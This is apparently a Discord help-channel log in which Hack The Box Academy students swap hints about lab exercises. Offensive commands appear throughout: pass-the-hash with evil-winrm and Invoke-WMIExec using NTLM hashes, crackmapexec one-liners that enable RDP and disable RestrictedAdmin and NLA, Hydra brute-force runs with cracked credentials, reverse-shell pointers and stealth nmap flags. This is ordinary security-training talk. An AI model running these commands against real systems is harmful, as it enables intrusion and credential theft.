#modules

python3 pty

instead of the actual terminal interface it's passed through a separate interpreter

pty - pseudo tty

yes

https://stackoverflow.com/questions/4426280/what-do-pty-and-tty-mean

it's not limited to just python3

yeah you can do it with other interpreters

it can be done with perl, ruby, and other languages

i tried that, but it didnt upgrade. But ok, i know what to do better. Talk to you tomorrow guys

i got the last flag. I took a cigarette break and did some google search and it worked

thanks guys for the help ❤️

python3 worked for me

ah then it's likely due to the fact there were no env variables initialized

which when you drop into a pty/tty it initiates them

but i learned something new, and corrected my approach.

hey locos. I am at the final exercise of file upload. Have identified most aspects of the vulnerability. The only thing I miss is where this is uploaded. I have been checking the script.js and the upload.php. In script.js we have many aspect of checking the file but doesn't indicate how the upload files are named or where they are stored. I think the code of upload.php should be accessed to find this but i can't find a way to see that code. Any hints are welcome thank you loads.

What in the module can be done to view files?

yeah 🙂

i just went and fetch that file through xxe

In password attack assessment do we need to use the pw-attacks resources
and is the assessment linked to previous exercise( like usernames) of the module

it seems that the txt flag doesn't really exist. trying to use in a PHPBASH interactive shell with a find command for txt files and it doesn't find none. When i do though ls -la on the first folder i am in I can see the files but when going to cd / nothing is appearing

Yes, including the mutated password list

you can sometimes find it in early parts of rockyou

as well

but start small --> big

the assessment is not linked to the sections in terms of the usernames/passwords on them

oh, ok

I read that as needing resources, no user accounts/passwords are the same / linked together from other sections

I'm pretty sure that at some part in that module they ask you to use credentials you found like 2 or 3 sections before

I did it manually according to my notes

better php webshell rather than PHPBASH interactive?

I am doing it also manually i think

Yes, you needed to keep track, but the assessment does not follow other than the mutated list

that's for the sections themselves, the skills assessment is a separate environment

just a vanilla php web* shell

Could I pick someones brain about AEN. I am got done doing the Initial Access but was wondering the tool that you use for the initial shell. How was I suppose to figure that out? Because the walkthrough instantly goes to that tool but I don't get why.

many people do AEN blind

Yeah thats why I try to keep it vague

if you don't understand why a tool is used, then I suggest reviewing the module that would be relevant to that tool

as the module itself is the walkthrough

I am trying to figure out how I was suppose to come to that conclusion

well then maybe you aren't ready

¯_(ツ)_/¯

examine all enumeration you've done

Oh for the assessment yeah

But how would you have come to that conclusion to use that tool?

thank you amigos for the hints. you are awesome

i haven't done the module myself, but i'm telling you: the reason a tool is used is because some part of your enumeration told you to use that tool

so if you don't have notes or something that would lead you to use a tool

Hello folks, i'm doing the password attacks module on the Pass the Hash (PtH) session, there i a question "Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt. " i have no clue of what i have to do, i even went to the solution but was unable to complete the challenge, what i am supossed to do more or less?

re-evaluate your notes and enumeration tactics

as many treat AEN as a mock exam, there's going to be a reluctance to assist

Keep things simple

Has anyone done the Exploiting Web Vulnerabilities in Thick-Client applications section in the Attacking Common Applications module? I just wondered if other found it incredibly difficult? Like I feel like this section assumes that I just know how to read java script and seems to go a million miles an hour with decompiling tools that have never been introduced before? Just feels like a super rushed section in my opinion. did anyone else struggle or just me?

Amazing exercise. You need to combine 2 hacks to reach the goal

this is the most common take on that section

btw im still waiting for help im lost af

What exactly have you done?

did you perform the steps outlined?

I followed the solution

Genuinely feel like my confidence just got destroyed lol. good to know its not just me then

from what you said you haven't tried anything or aren't giving enough info for us to help you

repeating the question isn't really helpful in determining where the error lies

have you tried switching to a different VPN

and trying the same steps again

Yes it is not an issue with the vpn

You will want to provide more detail, if any thing is a spoiler like a user name you can just use j* and ayone that has completed it will know what you mean

I don't understand what i am more or less suposed to do

i just remember doing the steps as shown in the section and it worked

based off of enumeration of the machine

the section itself details using PTH and shell catching ¯_(ツ)_/¯

there are plenty of ways to get in. https://www.revshells.com/

and if you said you followed a guide it sounds like you didn't fully read the section

also; using anything other than the module or the provided walk-through if you're an annual sub is cheating

since the Password attacks module is tier 1

as stated by the section; you need to use the nc binary in C:\tools; then generate the revshell using the Powershell #3 64 option

"Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt. " So i went to the machine's ip, got a shell using evil-winrm using the Administrator hash to and executed a command that allows me to rdp on using Julio's hash, and in the Julio's rdp session opened powershell, imported the module Invoke-theHash , opened another powershell on the Julio's rdp session and started a nc listener, went to revshells.com and created a payload, and then went to the powershell that i have ran the Invoke-TheHash module and ran "Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command "powershell -e PAYLOAD" and nothing happens. Am i mission som?

do you have the revshell payload set to that machine's proper interface to connect to

Hope that this isn't confusing

also you don't need to continually repeat the question

Ok sorry

the ip you should be using for the revershe shell should be a 172.16.x.x ip

not the 10.129.x.x ip

AH here is the kicker uh

also redact the hash as it's part of the section questions

you're trying to tell DC01 to connect to an interface it doesn't have

if you tried to have it connect to the 10.129.x.x

(basic networking)

Okay sorry

I believe that if i read the thing right i would be able to do that right?

ipconfig should give you the interfaces

So lemme understand, this is an active directory lab right?

when i tell it to spawn the target, it spawns a AD setup

it should, yes

the internal network has its own set of interfaces

And the ip address 10.129.34.105 (the one that is spawned) there is multiple instances inside it

Okay got it

that aren't directly accessible via the tun interface

Now i understand

I'm still confused tho, why cant i just use the rdp session that i got as the Julio user abd read the file in C:\julio\julio.txt

because

different machine entirely

MS01 != DC01

the machine you rdp into is MS01

they want you to create a connection to DC01

Wait, so if can rdp as Admin i would be able to see the julio.txt flag

So this question is for us to learn how to get a shell on the domain controler as one of the domain users

no

the point and layout

your attack machine --> MS01; which has multiple interfaces --> DC01; which only has one interface for MS01 to connect with

yes

RDP could be disabled on DC01

@urban fable we're somewhat beyond that point, and trying to get at the underlying learning

the learning portion is grabbing a shell on DC01

Alright now i makes sense. ill take a break and then i will try again with this new understanding. Thank you very much, your knoledge is on point. Lots of admiration for you.

basic networking goes a long way ¯_(ツ)_/¯

and understanding that the interface you connect to DC01 with, isn't the same that you connect to the target with

what an amazing link is this

would you be surprised that several modules link to this very site?

almost like it's a much easier way to get revshells than manually remembering and writing out every single syntax

Yes this is advance notes on the go

<@&861185840277487616>

Very good question. But I dont think somebody will understand the purpose of your question

LMFAO

bro

@dim wolf did you catch the split second?

yea that was funny af

god i love skids sometimes

ftp ip
enter username: anonymous
please enter your email as password: [enter]

No new module today?

They can only work so fast

Yep, was expecting a red team cert or a new windows / ad today, no problem

I would expect some time in Oct for it

plenty to eat from

Finished all the ad modules lol

deploy your own insecure AD lab and hack that in the mean time

Would you belive If I said that I have one?

Every attack on academy I replicate on my lab

nice!

now go for an azure lab

Azure does have a free tier btw

Good ideia, maybe after a O$CP

how do you do that :D?

you install the same setup ?

nope, I have 64gb RAM and 2tb ssd for my lab, I have 3 dcs and 3 workstations, of course I just spin up the machines that I need for a specific attack, let's say, spn hjiacking which was not part of my lab, I read the attack on htb, check some posts about the attack and make the domain vulnerable to the attack

Nice

Sometimes the server connection is so buggy that SSH just becomes unresponsive every like 30 seconds, is it just me? It's a bit annoying to do a lab like that lol

try changing vpn regions

¯_(ツ)_/¯

I tried

I think I'll just hop off for the day

question on the shells and payloads. my browser on the rdp session keeps reseting when i upload a war file on the tomcat site, and the zip on the status page. the page works as it should when i upload the wrong file, i get a wrong file error, but reset when i upload the one it asks for. following hacktricks manual from rce down the list. just need a nudge and not sure why i got the browser reset error.

change the vpn region

could be as simple as that

change vpn region, reset target, try again

also don't need hacktricks rce

the module provides an msfvenom revshell payload

(it's in the cheatsheet, you'll just need to adjust the IP/PORT

for LHOST/LPORT

Hey, can you give me a help with this module also? I know what the password is and I've been testing why my methods to brute force was not working but can't figure out why, the Task specifies something about anti-Csrf and modify my script to send such token, but I don't see this token also

nvm it just spawned. weird

Broken Auth?

Yeah

Section? Bruteforcing Passwords?

Yep

||You have to find out the password rules and then filter the password list accordingly||

||I've found it, made the list shorter, and I know the password, confirmed it visiting the site, but wanted to know why ffuf or wfuzz both didn't work to find the password, they both gave the same response as the wrong ones but I don't know why ||

send the passwords (any password) in the browser and see what happens

Then you know why the tools don't work

this was the solution. thank you, i got it. really was that simple...

||I'm stuck in password cracking, password mutation , with sam help ?||

Don't attack ssh

||I scan the ports.. so I have 21, 22, 139/445. I tried with ftp scan, ssh scan, smb scan, winrm scan (both with nxc). 😢 I'm using the custom.rule and generating the password with "password" word. damn.||

I don't get it, I get invalid credentials when wrong and ||welcome|| when right, like the other questions with ||wfuzz the --hs 'Welcome'|| worked, I don't understand why it doesn't at this one

Mutate the provided password list with the provided custom.rule

The mutated wordlist should be 94k words

I'll try that, ty

This is the direct instruction told to you by the section

send me a dm

You don't gotta spoiler your whole text dude and don't use that word even "masked"

The fact you masked it means you understand it's a negative word

ty!

Hi, I am on Windows Privilege Escalation Skills Assessment - Part II. I am trying to exploit CVE-2020-0668. I have executed CVE-2020-0668.exe with a successful output (exactly the same as in the module kernel exploit). But I still cannot get permission to write the maintenanceservice.exe. Can anyone give me some hints?

The window fundamentals course shows deprecated wmic

Wmic still works

¯_(ツ)_/¯

Just seems not productive to learn deprecated things 😂

Won't work on Arm devices

Hello all. I am working on sql injection fundamentals, and I am stuck on the subverting query logic section. I was able to successfully login with the username and using injection on the password, but I am not see any flag. It just says I have logged in successfully and there is a link to try again which just resets the login page.

I thought the flag would show when i got the successful login, but no luck. Any hints on what I am missing?

I just found that even the output is normal, but the CVE wasn't copying the file. It's a liar

nevermind. I was overthinking it.

You'd be surprised how many devices still run "deprecated" hardware/OS

I finally managed to exploit another vulnerability, but I am still curious about why the CVE-2020-0668.exe lied

<@&861185840277487616>

Seems like some clever work around of the filter

Since both those words should be banned and autoremoved

turns out im not as prepared as i thought i was for the aen 😭 time to hit the books again

(compromised the domain)

in Stack-Based Buffer Overflows on Linux x86 : Having a very difficult time understanding this. Are there any suggestions?

I watched a lot of videos about computer architecture and assembly language, but I did not understand the topic well. It takes a lot of time

section .data
        num DD 5
section .text

global _start

 _start:
        MOV eax,1
        MOV ebx,[num]
        INT 80h

I was inspired to write this simple program, but I don't really know what it does. I just memorize the code

What if you change some things?

section .data
        num DD 5
section .text

global _start

 _start:
        MOV ebx,1
        MOV ecx,[num]
        INT 80h

The code will work without any error

guyssssssssssssssss vpn academy is lagginggggggg what i do

anyy helpppp please im done

What do you not understand?

change vpn to a eu server

ebx if I changed to edx in the code Nothing happened

And when I used gdb

General registers
As the title says, general register are the one we use most of the time Most of the instructions perform on these registers. They all can be broken down into 16 and 8 bit registers.

32 bits : EAX EBX ECX EDX
16 bits : AX BX CX DX
8 bits : AH AL BH BL CH CL DH DL

Just another register of the same time and the same size.

Change it to bx and see what happens.

gdb where?

Instead of DD?

Thank you, I understand now

What is the best source for learning assembly language?

What do you advise me to study before assembly language?

It doesn't matter, I understood what I needed thx 💚

x86?

Yeah

ARM is more timely.

Send me a DM and when I get home I'll send you my bookmarks.

But yes, assembly is the most important language to know as a hacker, in my opinion.

Should I start with it or 64

It's underneath everything, and no one ever bothers to look at it 😉

x86, in my opinion.

Okay bro thx 💚

pwnable.kr is a good place for assembly CTFs.

In terms of learning assembly, I'd suggest learning RE.

Nice 👍

When you pair the language with an activity, you're more motivated to learn.

begin.re

Thx ☺️

Sure, I have more stuff on my laptop. Add me and ping me in a couple hours.

I need some help with Question - Connect via RDP with the Administrator account and submit the flag.txt as you answer. in the module ATTACKING COMMON SERVICES - attacking RDP. added the disabled reg key and try to login and get logon failures.

Are you using TCP or UDP VPN?

Okay done

Sweet. Yeah assembly is amazing. You have good instincts.

😅😅thx

Yep.

UDP

Use tcp

Try switching to TCP.

Yeah.

okay will do..ty.

If that doesn't work, come back 😛

Hi everyone. I'm in Windows Attacks and Defense, Object ACLs module. I've set a new SPN and also changed password for anni's account, but there is no Security event 4738 (User account was changed). Why might this be?

Edit: I've resolved this now. I was viewing security event logs on the local machine (WS001), but instead needed to view them on DC1 (I RDP'd there with htb-student credentials mentioned in the kerberoasting sub-module). I believe this is because the DC processes all changes to AD objects (e.g. accounts).

I am back...I still get - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server, when trying to login with pth for RDP.

Did you put the disabled reg key in the right place?

Screen !!!!

Hey! Having some issues on the FFUF module, specifically the section about sub-domains. ||I don't get any sub-domains at all from inlanefreight.com. I've tried with both Pwnbox and my own Parrot VM. I've also tried with Gobuster to check if it was an issue with my FFUF command. I basically tried copy-pasting the command used as an example in that very same section: (ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.inlanefreight.com/) and I get no result. With Gobuster the only domain found was www.inlanefreight.com, but that was with a different wordlist||. Did Inlanefreight change since this module was written?

This module btw: ||https://academy.hackthebox.com/module/54/section/488||

try with FUZZ instead of lowercase

I think Discord converted it to lower when it detected it as a URL. It's uppercase in my clipboard

I just tested myself and got the answer within 10 seconds. Are you running this command on the pwnbox or a vm?

I've tried both. On Pwnbox I did notice that every time I run ffuf on inlanefreight I start getting timeouts afterwards if I try access it through firefox, so I guess pwnbox is no good. I read somewhere in this channel that it would be caused by pwnbox's Internet traffic limitations.

On my VM (Parrot) The wordlists are a bit different, so I wonder if maybe that's a relevant difference. I've been trying with ||/usr/share/wordlists/dnsmap.txt||. I think that was preinstalled(?)

so you didn't actually use the command you just showed?

From pwnbox I did

try it from your vm

use subdomains-top1million-5000.txt

just like the module shows

Yeah will do, just gotta grab the SecLists. Don't think they're preinstalled on Parrot

iirc they are

might be mistaken though

there are multiple versions of parrotos. the regular one comes with no security tools at all.

looks like the security version also doesn't include seclists

Not in /opt/useful/ like on pwnbox at least. And not in /usr/share or /usr/share/wordlist either Afaik these are all I had by default

Parrot S

Yeah my VMware was lagging when I was running Kali sadly So Parrot it is

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

I love the way Parrot looks, but it's not reliable yet.

@cloud urchin is this the right directory?

That's the registry key that configures the RestrictedAdmin setting

Thanks! It worked within seconds now Didn't think the two wordlists would make that huge difference

Both aimed at subdomains after all

Where's he screwing up? Did he forget to delete the old one?

well his error is saying login error

it could be something completely unrelated

FFuF... You climbing CPTS mountain?

True.

What command are you using to connect with rdp

Haha nah just hobby, and really just a beginner. Just trying to do some bit of Academy every week to keep learning

Welcome to the party.

Do the CPTS. I promise you'll have fun... That or get obsessed with popping boxes 😛

xfreerdp /v:10.129.220.125 /u:administrator /pth:xxxxxxxxx /cert-ignore

what module

Add /dynamic-resolution

It won't fix your connection, but it's awesome.

Attacking RDP - Attacking Common services

okay, SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server

logon failure usually means the creds are wrong, make sure you have entered the right ones

ok yeah, the module goes over this reg key specifically actually

reg key should be good, maybe its the hash

Can he post the hash?

Also

He might have grabbed the wrong part of it.

Maybe

Just the first 2 letters are enough tbqh

pth:30

Yeah that doesn't look right

You grabbed the hash from the file on the desktop?

It looks like you just copy/pasted the example command

Hi - having some trouble with Footprinting lab (easy) and it looks like maybe the writeup details are possibly innaccurate

module doesn't really cover it and i've ran all this stuff on some boxes which does enable rdp, but i think sometimes the boxes have some auto-logoff script because sometimes it'll connect then boot me out. ```CME module:
sudo crackmapexec smb <ip> -u user -p password -M rdp -o ACTION=enable

Disable RestrictedAdmin (allows admins to remote in):
sudo crackmapexec smb <ip> -u user -p password -x "reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f"

Enable RDP from CMD:
sudo crackmapexec smb <ip> -u user -p password -x "reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f"

Disable NLA:
sudo crackmapexec smb <ip> -u user -p password -x "reg add "reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f"

Allows remote administrative traffic through the Windows Firewall:

netsh firewall set service remoteadmin enable

Allows Remote Desktop traffic through the Windows Firewall:

netsh firewall set service remotedesktop enable```

Nah writeup isn't innacurate, tbh it's just that ||DNS|| isn't required

His error is wrong hash

yeah, i didn't think it was an RDP thing

still good info for people

for the step i'm on, the writeup says to check the lab HINT for the answer (which isnt there)

There's an explicit hash given in the special document on the desktop of htb-student

pth:0E

What step are you on?

Did you try it and see, or are you asking me

I've enumerated and know the internal host I'm supposed to connect to, but there is no indication as to how you are supposed to find the user and creds to login with

@fathom pendant

OHHHHH

I am closer now...now I see registry key is problem, no longer login issue.....I got the flag...thank you.

I know exactly what you're referring to

The creds used to be in the hint

Then they gave it explicitly in the readout for the assessment

ceil

I am good now, I get denied but I see splash page now that says login restricted so I will look at my registry keys..thank you.

Gotta log in via win-rm to be able to remove it and have the right privs too

Good shout @gusty zinc

: ) Presumably needs updating I assume? If a user doesnt have the paid sub they'd be hard pressed to get in without brute forcing

no they wouldn't

read the lab intro

Additionally our teammates...

ah shoot your right

😉 reading the synposis of the engagement helps

https://tenor.com/view/doh-homer-simpson-facepalm-face-palm-oops-gif-4232719564739845509

it also helps identify keywords that might otherwise get you stuck

thank you non the less

no problem

and I submitted to #1234357888114364508 as it's still an error in the Walkthrough

Nice

it's likely that a bulk of the walkthroughs were written prior to some updates

because the hint change has been out there for like.... at least half a year now

if not longer

I remember being in the same boat when it was the harder version

like "how was i supposed to figure this out" and revisiting once I learned techniques from a later module

How do I scan a network quietly? NMap is too loud.

nmap lol. just different settings

^

-Pn --disable-arp-ping -n

disables ICMP ping, ARP, and reverse DNS lookup

another general tip;
always look for everything, enumeration is a cyclical process

I'm wracking my brains trying to workout where I'm going wrong with Burpsuite in the "Using Web Proxies" module. Everything seems fine with configuring foxyproxy and setting up the portswigger CA in firefox but then it seems like I'm doing something with trying to get it forwarding the right way once I have interception turned on. I've noticed that Burpsuite's chromium browser doesn't seem to change and I'm not sure if it's meant to navigate to the ip and port if that makes any sense.

I've tried doing the ip=;ls; command but whatever it's doing, it isn't giving me the lists of .txt documents it should be. Apologies if I'm being quite vague I'm just having a hard time putting my finger on whats going wrong.

Could I get some assistance with ACTIVE DIRECTORY ENUMERATION & ATTACKS - Living Off the Land please?

For the last question
Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.
I was able to get the answer with
||dsquery * -filter "(adminCount=1)" -attr sAMAccountName description|| however that just gave me a list of all admins & their description, thus giving me the flag. How am I supposed to find the answer properly? There's nothing in my solution that specifically finds a disabled account and my attempts to use combined filters have all failed.

there are many different ways to do it

the module provides a link to wmic queries which i believe you can also use

well, attempting it with the hint would mean using dsquery and ldap

i guess it also talks about it itself in the module

I can easily get a list of disabled users, I can get a list of admins, I'm struggling with getting a list of disabled admins

it gives net commands too

did you try ((&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2)(memberOf=cn=Administrators,cn=Builtin,dc=yourdomain,dc=com)))

returns nothing

I tried a number of queries that individually they both worked, but when combined they would give nothing

did you modify the dn etc

maybe remove the category too

(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2)(memberOf=cn=Administrators,cn=Builtin,dc=yourdomain,dc=com))

Okay, I completely went back & made it as simple as I possibly could and got ||dsquery * -filter "(&(userAccountControl:1.2.840.113556.1.4.803:=2)(admincount=1))" -attr sAMAccountName description|| that finally gave me the correct output.

ez

I feel as though I tried that already, but I must have had a typo somewhere or something. Ty for the input

I spent way too much time trying to find a flag I already found... lol

you say that like it's a bad thing. you're learning new stuff and knowing how/why it works is really important. i spend time on modules i've done like that too.

Yeah, if I wanted to finish this quickly, I could. I'm trying to actually learn and understand everything, as finishing the path isn't the goal. Gaining the skills and knowledge is.

Anyone have a workaround for the Windows Privilege Escalation Module's Windows Built-in Groups section, specifically this portion?

I covered the issue with the target environment in erratum just now, but I wanted to see if anyone has found a way to complete this technique with a workaround.

Already got the flag and reported it, so if not, I guess it's not a huge deal for now, just frustrating that I can't practice all of the methods.

is there anyone who completed this module i need help with it in the skills assessment area "Login Brute Forcing" https://academy.hackthebox.com/module/57/section/515

what do you need help with

i need help in bruteforcing to the login panel

go on

i got through the first one and i'm stuck in the second panel

this is the code i used

but i keep on gettin random passwords

this is the skills assesment

you should probably delete that command

send me a DM

anyone else had their academy progress reset after that SSO migration?

you should contact support team

yeah I am. just wondering if anyone else experienced that

Hello team 🙂

i have a probleme with ths openvpn config.
i can get an anwers from the target .

it's from a wsl ubuntu config

what module

linux fonda

when i do it from the same openvpn config but whit my laptop kali i dont get this problem

only from the wsl

yeah wsl kinda sucks

strange

INTRODUCTION TO WINDOWS EVASION TECHNIQUES / Introduction, the credentials given to connect to the windows host seems not to work.

which section

Introduction

never mind

works for me

yeah works now

let me guess quotes around the password

no...i used the normal xfreerdp /v:<target IP address> /u:<ussername> /p:<password>, which does not work, but this given in the module works: xfreerdp /v:[IP] /u:[USERNAME] /p:'[PASSWORD]' /dynamic-resolution /drive:linux,/tmp

yeah quotes lol

no

the first command that doesn't work doesn't have quotes around the password, the second one does

it's the quotes

no😂

For attacking authentication mechanisms under SAML signature wrapping attacks, after i remove ds:signature node, i keep getting a Invalid SAML Response. Not Authenticated error. any help

It is the quotes.

ah wrong quotes...

dynamic resolution just gives you exactly that, dynamic resolution, and the drive argument shares a folder path

but i used them before....

ok you are right

you probably used double quotes instead of single

but double quotes also work sometimes no?

If you have special characters like !? In the password its best to use single quotes

i think it depends on the characters inside them

Literal strings

alright. my bad. you were total right 😉 But I really think that I've never had any problems with double quotes so far...

if u wanna continue with double you’d have to escape them manually
password\!\!\?

yeah probably because of the password, if it didn't have $ and ! double quotes would probably work

Hello, I am stuck on Login Bruteforcing, skills assessment, website part, question 2. everytime I bruteforce the password, it gives me a different answer, I am unable to login to the admin panel

You should probably delete that pic just in case, but you need to ensure you've enumerated what you're attacking correctly

uh, I am sure about the username, its from the previous question.

my issue is that its giving me a positive for multiple passwords, none of which work.

what is that "clear" at the end of the command?

You have not enumerated correctly because your command is off

uh wait

no it works on other modules 😉

Now I really thought I was crazy...haha

typo I guess because I cleared the outputs from before.

I see. I have removed the clear and it still doesnt seem to work. let me try a couple times

verify your command against the target

it wasn't the clear part

cause you need to "enumerate" better, did you check all the parameters? Are they correct?

Bump

I think I see my mistake now. Looks like I hadnt understood clearly what you or the module meant by enumerating parameters. let me see if it works. thanks

thanks. it worked. I have understood what I did wrong.

When using ffuf for subdomain enumeration, all results return with 403 Forbidden?

No, not necessarily. Depends on the webserver / web application you're enumerating.

Sorry, I meant against my own setup. Why does it return 403 forbidden?

Because you configured it like that? Considering it's your own setup 😉

Is it default? When i try to access it inside a web browser it just says not found but when using ffuf it returns all results with 403

That's impossible to answer without knowing what you are using and how you've configured it.

Oh okay, no worries. Wondered if it was something I was doing wrong with ffuf

I'll deep dive into the config

Hello i'm doing the password atacks mudule on the pass the hash section

We don't have access to the domain controler, and if you try to rdp into the target using the hash it logs you out.

So you need to get a winrm session , execute a command that allows you to use rdp using the hash

My question is, if we don't have access to the domain controler, how can we get a winrm session using "evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453" and execute "c:\tools> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f" (to be able to login in xfreerdp using the hash) and that actualy changes something?

Didn't we have to execute that in the domain controler?

As far as i know we are executing the command to disable "DisableRestrictedAdmin" to 0 to allow us to login via rdp using the hash, but since we don't have access to the domain controler how is that possible?

I had same problem, I managed to complete it on PwnBox instead of VirtualBox.

For attacking authentication mechanisms under SAML signature wrapping attacks, after i remove ds:signature node and injecting my assertion node, i keep getting a Invalid SAML Response. Not Authenticated error. any help?

This is a setting for the client you want to connect to and not a "global" setting.

But i execute the command to allow using the hash to login with rdp as the administrator user not julio

Not running kali bare metal? what a script kiddie

So what? If julio had the access rights to modify that key, you could set it with julio as well

But i set it as the administrator user not julio

Isn't julio only a domain under the domain controler? How can i be that a i set the command that allows you to access rdp using the hash as the Administrator user on a diferent domain?

No... julio is not a domain. That's beside the point anyway...
If you want to RDP into the target with the (local) administrator hash, you have to set the key. The domain is not relevant for this part.

hello, i got a probleme with the login brute force module, am in the last section. Hydra take too much time or dont work can someone help me?

More details please

So i had a similar problem

My computer is trash, so i used pwnbox

and if pwnbox takes too much time too, even tho you used the right command

i use pwn box too, wait i find you the command than i used

it was taking too long for me too

what i did is that i clicked on the solution and skiped waiting

also if you check the solution and you indeed put the right command and it was just a matter of waiting that isn't REAAAKY cheating

The solution also tells you if you are indeed using the right command, skipping a lot of frustration

Look tell me what you think, a lot of hacking by yourself is this grind of constant frustration and persistence

i'm working as a junior penetester, i have a mentor, the mentor teaches me the concept, and if you understand the concept because your mentor helped you out it skips a lot of the grinding and gets you the same learning experience

You can you the solution as your mentor, as long as you understand the concept it isn't really cheating

there might be the argument that you did not have to research the exact commands, but i believe that commands and other details will always change, but if you understand the concepts you are fine.

So that's my philosofical argument that if you check the solution it isn't really cheating as long you understand the concept

If you just copy paste the answer, yeah thats cheating because you learn't nothing

That's why is so good having a mentor

i would love too, but my mentor is working (he is a pentester too)

where can i find the solution?

low-key jealous you guys are both working in the field

Right beside the submit button

On the right of the hint button

It will pop open a window with the walkthrought

there

But don't worry you can use the solution to be kinda of your mentor

idk why i dont have it

Do you have adblock?

it's only available if you have the Gold or Silver annual plan.

Sheeeeeeesh

sheeeesh

Okay but lemme help you, tell me the exact thing you need the anwser for and ill tell you

Hii everyone I was going through the Network enumeration with Nmap module, and read a line that says:

"By default, Nmap scans the top 1000 TCP ports with the SYN scan (-sS). This SYN scan is set only to default when we run it as root because of the socket permissions required to create raw TCP packets. Otherwise, the TCP scan (-sT) is performed by default. "

I decided to confirm it using chatgpt and it said this line is incorrect...

can someone tell me whats right?

the last section, and the first question (i need the password to connect in ssh too)

To an extent I agree with this, so long as you try without a solution beforehand. If you immediately skip to the solution and then try to "learn" or reverse-engineer the solution for the sake of learning, I think you're still cheating yourself by skipping the chance to practice exploration. Besides, problems don't necessarily have only one solution.

In the table of contents, whitch one

skills assessments- Service login (login brute force module)

eazy, medium, hard?

You can observe in wireshark the traffic captured from sudo nmap will never have a complete tcp handshake (SYN scan)
And if you tried to -sS without sudo it will complain

Nmap: A network scanning tool used to discover hosts and services on a computer network.
SYN scan (-sS): A type of port scanning technique that sends SYN packets to a target to determine the status of ports (open, closed, or filtered). It is efficient and stealthy but requires root privileges to send raw packets.
TCP connect scan (-sT): A port scanning technique that uses the operating system's network functions to establish a full TCP connection with each target port. This scan does not require root privileges but is less stealthy and slower compared to SYN scans.
Root: The highest level of access in a Unix-like operating system, providing unrestricted access to all commands and files.
Socket permissions: Security settings that control the ability to create and use network sockets, which are endpoints for sending and receiving data across a network.
In essence, Nmap's default behavior for scanning ports depends on the user's access level: root users perform a more efficient SYN scan, while non-root users perform a TCP connect scan.

you did this command right? "hydra -L Password-Attacks/username.list -P Password-Attacks/password.list ftp://STMIP -t 40 -f -u"

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-20 02:24:17
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 40 tasks per 1 server, overall 40 tasks, 21112 login tries (l:104/p:203), ~528 tries per task
[DATA] attacking ftp://10.129.50.229:21/
[STATUS] 724.00 tries/min, 724 tries in 00:01h, 20388 to do in 00:29h, 40 active
<SNIP>
[21][ftp] host: 10.129.50.229 login: mike password: 7777777
<SNIP>

this is the output of the hydra command

no i did hydra -L user.txt -P harry.txt -u -f ssh://SERVER_IP:PORT -t 64

waddip nerds

Did you use the username and password list provided by the module?

Oh wait

yeah harry and harry.txt

you trying to brute force ssh

brute force ftp bro

ssh is impossible to brute force

fr?

I mean, it is possible, it just takes a reaaaaaaly long tine

time

ftp is much faster and they using the same password on ftp for ssh

thanks for the tips

That is very true

Module: Attacking Common Services - Attacking FTP

What username is available for the FTP server?
|| I accessed the FTP service on port TCP/2121 using the anonymous login. I then downloaded the users.list file and passwords.list file to my attack host from the FTP server. To answer the question, I tried inputting all 11 usernames until I got the answer, which I did. ||

However, I know this can't be the right way to validate which username is available for the FTP service, so what is the right way?

you needed to bruteforce the one of the services with the wordlists. (ssh) i think.

I've already attempted to brute force the FTP service runnning on the target using the users.list and passwords.list files I got. It didn't find any credentials that work.

What I'm trying to find is how I can validate the username for the FTP service.

Did you scan the full range of ports?

Not yet, will do.

Anyhow try to bruteforce one more time the FTP server with the wordlists you got

So brute forcing would be the only method of validating the username that works for the FTP service?

I just noticed this module has a username list and password list under resources, so I'm trying to brute force with that this time.

I have used the one found in the FTP

hi

Didn't work for me.

can you hide the screenshot and mark it as a spoiler? Try without using threads

Okay.

Let me know how it goes otherwise dm me

From HTB Academy: Footprinting > DNS > Footprinting the Service:

This is because if there are other DNS servers, we can also use them and query the records. However, other DNS servers may be configured differently and, in addition, may be permanent for other zones.
https://academy.hackthebox.com/module/112/section/1069

Does this mean to say pertinent for other zones? I'm not familiar with and could not find any information about what it means for a DNS server to be permanent for a zone.

Bypassing Basic Authentication after changing request method to HEAD, still getting login form. Can someone help ?

did you change this only to HEAD?

you can submit to #1234357888114364508 if you think it's a typo, if it gets fixed it does, otherwise you might get more clarity ¯_(ツ)_/¯

Exactly what I was just looking for, a way of offering feedback. Thanks!

